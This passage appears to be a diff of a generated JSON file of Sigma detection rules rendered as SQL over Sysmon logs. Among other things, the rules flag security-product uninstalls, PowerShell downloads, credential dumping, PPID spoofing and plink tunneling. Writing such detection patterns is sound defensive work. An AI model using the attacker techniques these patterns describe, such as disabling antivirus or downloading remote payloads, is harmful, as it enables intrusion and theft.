CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": 
"proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Computer Password Change Via Ksetup.EXE", + "id": "de16d92c-c446-4d53-8938-10aeef41c8b6", + "status": "experimental", + "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /setcomputerpassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_ksetup_password_change_computer.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", + "status": "experimental", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unknown" + "System administrator usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" }, { - "title": "Service 
Reconnaissance Via Wmic.EXE", - "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "title": "Suspicious Msiexec Quiet Install From Remote Location", + "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "status": "experimental", - "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1047" - ], + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], 
- "filename": "proc_creation_win_wmic_recon_service.yml" + "filename": "proc_creation_win_msiexec_install_remote.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", + "attack.defense_evasion", + "attack.t1036", "attack.t1003.001" ], "falsepositives": [ - "Very unlikely" + "Command lines that use the same flags" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": 
"proc_creation_win_renamed_createdump.yml" }, { - "title": "MSExchange Transport Agent Installation", - "id": "83809e84-4475-4b69-bc3e-4aad8568612f", - "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious Cmdl32 Execution", + "id": "f37aba28-a9e6-4045-882c-d5004043b337", + "status": "experimental", + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" + "filename": "proc_creation_win_lolbin_cmdl32.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. 
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR 
CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. 
As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "status": "experimental", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Service Started/Stopped Via Wmic.EXE", - "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "status": "experimental", - "description": "Detects usage of wmic to start or stop a service", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? 
\\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_wmic_service_manipulation.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.t1566.001" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) 
even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Dropping Of Password Filter DLL", + "id": "b7966f4a-b333-455b-8370-8ca53c229762", "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" }, { - "title": "File Decoded From Base64/Hex Via Certutil.EXE", - "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. 
This can be abused by attackers to decode an encoded payload before execution", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_decode.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Rundll32 With Suspicious Parent Process", - "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", - "status": "experimental", - "description": "Detects suspicious 
start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", - "author": "CD_ROM_", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "falsepositives": [ + "Administrative activity" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_plink_susp_tunneling.yml" + }, + { + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Administrative activity", + "Software installation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel 
